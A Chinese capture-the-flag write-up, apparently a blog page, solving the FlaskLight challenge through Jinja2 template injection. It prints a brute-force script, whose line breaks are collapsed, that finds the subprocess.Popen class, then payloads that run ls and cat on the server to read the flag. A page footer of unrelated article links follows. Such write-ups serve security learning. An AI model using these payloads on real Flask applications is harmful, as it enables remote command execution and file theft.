[CSCCTF 2019 Qual]FlaskLight 1

查看网页源代码,发现里面的提示

尝试输入url

http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.node3.buuoj.cn/?search={{1*9}}


成功回显,说明存在ssti注入
使用{{’’.class.mro[2].subclasses()}},可以爆出object类中所有子类,找出subprocess.Popen,copy大佬额exp。

import requests
import re
import html
import timeindex = 0
for i in range(170, 1000):try:url = "http://xxxx/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"r = requests.get(url)res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)time.sleep(0.1)# print(res)# print(r.text)res = html.unescape(res[0])print(str(i) + " | " + res)if "subprocess.Popen" in res:index = ibreakexcept:continue
print("indexo of subprocess.Popen:" + str(index))

得到了subprocess.Popen的下表为258。
列出所有目录文件

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}


查找flasklight目录下的文件,发现疑似flag的文件

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}


读取文件coomme_geeeett_youur_flek文件

?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}


成功获取flag

ssti练习之[CSCCTF 2019 Qual]FlaskLight 1相关推荐

  1. 一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI

    目录 SSTI 无二次渲染的示例 存在二次渲染的示例 漏洞复现 [CSCCTF 2019 Qual]FlaskLight 做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是 ...

  2. [CSCCTF 2019 Qual] FlaskLight

    信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程 ...

  3. [CSCCTF 2019 Qual]FlaskLight——直取flag?

    [CSCCTF 2019 Qual]FlaskLight 前言 白天一直在上课,晚上赶快躲进图书馆里面打打靶场.这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强 ...

  4. BUUCTF:[CSCCTF 2019 Qual]FlaskLight

    题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?searc ...

  5. [CSCCTF 2019 Qual]FlaskLight SSTI注入

    进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49 ...

  6. [CSCCTF 2019 Qual]FlaskLight 记录

    这个根据题目名字,flask模板注入,找注入点 查看源码发现GET传参 直接测试模板注入 常规模板注入 试了试之前做过的模板注入,都行不通 然后百度了一波,原来这是python2的 难怪不行 {{'' ...

  7. buu(ssti模板注入、ssrf服务器请求伪造)

    目录 目录 [CISCN2019 华东南赛区]Web11 [BJDCTF2020]EasySearch [De1CTF 2019]SSRF Me [CSCCTF 2019 Qual]FlaskLigh ...

  8. [BUU刷题记录]day01-起步

    BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io contain ...

  9. BUUCTF-模板注入专项刷题

    SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018 ...

最新文章

  1. MathType支持64位 WIN 7Office 2013(完美解决)(转载)
  2. Visual C++ dll
  3. int b = 1;int c = b^0xff;求C
  4. 网学天地计算机组成与原理试题,哈工大2007年秋季学期计算机组成原理期末试题...
  5. 案例 github_github 项目搜索技巧-让你更高效精准地搜索项目
  6. 浅谈mpvue项目目录和文件结构
  7. 牵手大企,关于图形计算、HPC与AI,NVIDIA言有尽而意无穷!
  8. HTML,CSS,JavaScript学习笔记--导航
  9. SpringBoot-(1)-IDEA创建SpringBoot项目并运行访问接口
  10. 安卓DialogFragment如何使用?
  11. Java使用IntelliJ IDEA创建JavaWeb应用程序并配置Tomcat
  12. matlab的GUI实验——实现简单信号发生器
  13. 互联网轻量级框架SSM-查缺补漏第八天(MyBatis插件plugin使用及原理)
  14. Win制作苹果IOS证书
  15. 计算机视觉项目实战-驾驶员疲劳检测
  16. DIV+CSS图片和文字如何显示同一行
  17. 微信模拟地理位置_微信电脑版伪装地理位置的方法
  18. 20162312大二上学期总结博客
  19. MTK平台系统稳定性分析
  20. maya中英文对照_求玛雅的全部中英文对照

热门文章

  1. unity 蜡烛火光shader
  2. boss直聘一句话介绍优势_05.29 | 早读英语角 | 自我介绍,如何一句话拉近关系?...
  3. spring框架xml的几种配置方式
  4. 剑指offer-字符串总结
  5. verilog符号 与或非 异或_在Verilog HDL设计中用什么表示异或
  6. csv文件太大,显示不全,切分成小文件
  7. layer icon图标汇总
  8. 3dmax入门教程(一)
  9. c 语言编辑器 win7旗舰版,如何使用大地win7旗舰版内置字符编辑程序
  10. 双亲表示法、孩子表示法、孩子兄弟表示法(二叉树表示法),森林和二叉树的转换